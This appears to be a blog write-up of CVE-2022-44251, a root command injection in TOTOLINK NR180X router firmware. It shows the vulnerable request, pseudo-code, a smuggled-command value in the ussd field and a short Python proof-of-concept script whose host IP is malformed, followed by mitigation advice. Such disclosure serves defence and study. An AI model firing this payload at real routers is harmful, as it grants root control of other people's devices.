CVE-2022-44251 - Command Injection Vulnerability in TOTOLINK NR180X’s setUssd Function

In late 2022, a high-severity vulnerability was disclosed affecting TOTOLINK NR180X routers running firmware version V9.1.u.6279_B20210910. Labeled as CVE-2022-44251, this flaw allows attackers to inject and execute commands on the device as root by abusing the ussd parameter in the setUssd method.

Here's an exclusive, step-by-step breakdown of how this vulnerability works, including an analysis, snippets of relevant code, practical exploit details, and links to original sources.

What is CVE-2022-44251?

An unauthenticated or low-privilege user can exploit a web interface endpoint on the TOTOLINK NR180X. Specifically, the router’s admin panel allows configuration of a 3G/4G USB dongle via USSD commands. Insecure handling of the ussd parameter leads to OS command injection.

Affected Device:  
TOTOLINK NR180X  
Firmware: V9.1.u.6279_B20210910

Where is the Vulnerability?

The flaw stems from a function called setUssd, which processes the ussd parameter from the HTTP request. Due to lack of sanitization, user-provided data is sent directly to a system shell.

Vulnerable Endpoint (Example)

POST /cgi-bin/cstecgi.cgi
Content-Type: application/x-www-form-urlencoded

topic=wifi_host_ussd&op=set&ussd=*123#

You can see the ussd parameter is user-controlled.

Here’s a simplified pseudo-code example to illustrate the logic

// Inside setUssd() function
char cmd[128];
snprintf(cmd, sizeof(cmd), "/bin/usb_ussd %s", ussd);  // <-- No sanitization!
system(cmd);  // command injection occurs here

If an attacker passes something like *123#;ls, the command will be

/bin/usb_ussd *123#;ls

It will execute /bin/usb_ussd *123#, and then also ls as root.

Proof of Concept (PoC) Exploit

Below is a basic example exploit written in Python. This script injects a command (ls /) using the vulnerable ussd parameter.

import requests

host = "http://192.168..1";  # Change to match your router's IP
url = f"{host}/cgi-bin/cstecgi.cgi"

payload = "*123#;ls /"  # The injected command is 'ls /'
data = {
    "topic": "wifi_host_ussd",
    "op": "set",
    "ussd": payload
    # Add other required parameters if needed
}

r = requests.post(url, data=data)
print(r.text)

Warning: Only use this on devices you own and have permission to test!

Local Network: Any user or malware inside the local network can gain root access on the router.

- Remote Attacks: If the router’s admin interface is exposed to the internet, a remote attacker can compromise the router.
- Persistence: An attacker could use this to install rootkits, sniff traffic, or add user accounts.

Mitigation and Recommendations

- Update Firmware: TOTOLINK may have released firmware fixes since. Always run the latest firmware. (Check TOTOLINK’s support page).
- Restrict Admin Access: Block remote/web access to your router’s admin console from outside your trusted network.

References and Further Reading

- Original NVD Entry: CVE-2022-44251
- Exploit database write-up (exploit-db 51498)
- TOTOLINK Official Website
- Firmware Download for NR180X
- Chinese Security Report (知乎)

Final Thoughts

CVE-2022-44251 highlights how a single unsanitized input can let attackers take full control of a home router. If you use a TOTOLINK NR180X, patch as soon as possible and always follow basic security hygiene.

Stay tuned for future updates and keep your devices locked down!

Timeline

Published on: 11/23/2022 16:15:00 UTC
Last modified on: 11/26/2022 03:42:00 UTC